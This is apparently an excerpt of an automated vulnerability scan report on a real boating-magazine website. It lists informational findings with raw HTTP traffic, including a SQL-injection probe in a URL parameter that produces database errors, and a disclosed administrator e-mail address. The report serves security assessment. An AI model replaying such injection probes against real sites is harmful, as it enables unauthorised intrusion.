User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:45:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html


<br /><b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /templates/

/templates/ CONFIRMED

http://www.soundingsonline.com/templates/

Request

GET /templates/ HTTP/1.1
Referer: http://www.soundingsonline.com/templates/soundings1/favicon.ico
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=v7fg3em4pehjs5etfdvqeg34e3
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:24:41 GMT
Connection: close


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /

/

http://www.soundingsonline.com/

Found E-mails

  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Featuring Boating News, Stories and More | Soundings Online</title> <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/index.php?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_new_boats&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_mishaps_and_rescues&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_know_how&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_used_boat_review&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=newsshow1&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=130px&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_seamanship_and_safety&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_blogs_and_columns&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&amp;text_block_bgcolor=ffffff&amp;text_block_width=195&amp;text_block_opacity=0&amp;text_block_margin=405&amp;module_width=615&amp;module_height=270&amp;thumbnail_bar=1&amp;thumbnail_width=66&amp;thumbnail_height=44&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_bar_position=1&amp;image_x=0&amp;image_y=0&amp;slides_count=4&amp;tick_x=405&amp;tick_y=-22" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_news_show_gk3/scripts/engine_compressed.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/engine_compress.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&amp;animation_slide_speed=500&amp;animation_interval=9000&amp;autoanimation=1&amp;animation_slide_type=0&amp;animation_text_type=0&amp;base_bgcolor=ffffff&amp;text_block_opacity=0&amp;thumbnail_width=66&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_border_color=a81c21&amp;thumbnail_border_color_inactive=ffffff&amp;interface_x=-20&amp;interface_y=0&amp;clickable_slides=1"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_home"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: 1, m_home-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /templates/

/templates/

http://www.soundingsonline.com/templates/

Extracted Version

Microsoft-IIS/6.0

Request

GET /templates/ HTTP/1.1
Referer: http://www.soundingsonline.com/templates/soundings1/favicon.ico
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=v7fg3em4pehjs5etfdvqeg34e3
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:24:41 GMT
Connection: close


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /index.php

/index.php

http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid='..

Identified Internal Path(s)

/home/98

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(1' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(1' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/index.php" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Featuring Boating News, Stories and More | Soundings Online</title> <link href="/home/98?layout=blog&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/home/98?layout=blog&amp;format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_home"><!--
Type of page: category<br />Section: 16, s_uncategorized<br />Category: 98, c_uncategorized<br />Menu: 1, m_home-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a 